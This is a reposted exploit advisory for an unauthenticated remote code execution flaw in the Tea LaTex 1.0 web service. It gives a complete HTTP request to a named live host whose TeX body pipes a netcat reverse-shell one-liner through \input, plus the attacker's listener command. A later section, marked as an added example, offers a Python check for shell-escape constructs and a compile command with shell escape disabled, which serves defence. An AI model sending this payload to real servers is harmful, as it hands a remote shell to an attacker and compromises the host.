Tea LaTex 1.0 - Remote Code Execution (Unauthenticated) - Hack之路

# Exploit Author: nepska
# Vendor Homepage: https://github.com/ammarfaizi2/latex.teainside.org
# Software Link: https://github.com/ammarfaizi2/latex.teainside.org
# Version: v1.0
# Tested on: Kali linux / Windows 10
# CVE: N/A


# Header Request
POST /api.php?action=tex2png HTTP/1.1
Host: latex.teainside.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
DNT: 1
Connection: keep-alive
Cookie: __cfduid=d7e499dd5e2cf708117e613f7286aa2021599260403

{"content":"\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}","d":200,"border":"50x20","bcolor":"white"}
# Payload
\documentclass{article}\begin{document}\input{|"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1234 >/tmp/f"}\end{document}
# Attacker
nc -lvp 1234
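
# Defensive check (added example, not part of the original advisory or the project's code)
The request above works because the submitted "content" field is compiled with TeX shell escape enabled, so the piped \input form reaches a shell. The sketch below inspects a tex2png JSON body for shell-escape constructs and builds a compile command with shell escape off. The function names, the use of pdflatex and the sample bodies are assumptions made for illustration.

```python
import json
import re

# TeX constructs that reach a shell when shell escape is enabled.
# "piped-input" is the \input{|"..."} form used in the request above.
SHELL_ESCAPE_PATTERNS = {
    "piped-input": re.compile(r"\\(?:input|include)\s*\{?\s*\|"),
    "write18": re.compile(r"\\write\s*18\b"),
}

def find_shell_escape(tex: str) -> list[str]:
    """Return the names of shell-escape constructs present in TeX source."""
    return sorted(n for n, rx in SHELL_ESCAPE_PATTERNS.items() if rx.search(tex))

def inspect_body(raw: str) -> dict:
    """Parse a tex2png JSON body and report findings on its "content" field."""
    try:
        doc = json.loads(raw)
    except json.JSONDecodeError:
        return {"ok": False, "reason": "invalid-json", "findings": []}
    content = doc.get("content") if isinstance(doc, dict) else None
    if not isinstance(content, str):
        return {"ok": False, "reason": "missing-content", "findings": []}
    findings = find_shell_escape(content)
    reason = "shell-escape" if findings else ""
    return {"ok": not findings, "reason": reason, "findings": findings}

def compile_argv(tex_path: str) -> list[str]:
    """Compile command with shell escape off (pdflatex is an assumption).

    The pattern match is only a detection signal, since TeX macros can
    hide the literal text; -no-shell-escape is the actual control and
    disables both \\write18 and piped \\input.
    """
    return ["pdflatex", "-no-shell-escape", "-interaction=nonstopmode",
            "-halt-on-error", tex_path]

# Constructed sample bodies (field names taken from the request above).
BENIGN = json.dumps({"content": r"\documentclass{article}\begin{document}"
                                r"$e^{i\pi}+1=0$\end{document}",
                     "d": 200, "border": "50x20", "bcolor": "white"})
PIPED = json.dumps({"content": r"\documentclass{article}\begin{document}"
                               r'\input{|"echo constructed"}\end{document}',
                    "d": 200, "border": "50x20", "bcolor": "white"})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("piped", PIPED)):
        print(name, inspect_body(body))
    print(" ".join(compile_argv("input.tex")))
```

The same setting can be made the default for every TeX run on the host with `shell_escape = f` in texmf.cnf.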

                                                        

Site: https://www.hackzl.cn; Publisher: hack之路. When reposting, please cite the source: https://www.hackzl.cn/index.php/2020/09/12/tea-latex-1-0-%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%a3%e7%a0%81%e6%9c%aa%e7%bb%8f%e8%ba%ab%e4%bb%bd%e9%aa%8c%e8%af%81-hack%e4%b9%8b%e8%b7%af/
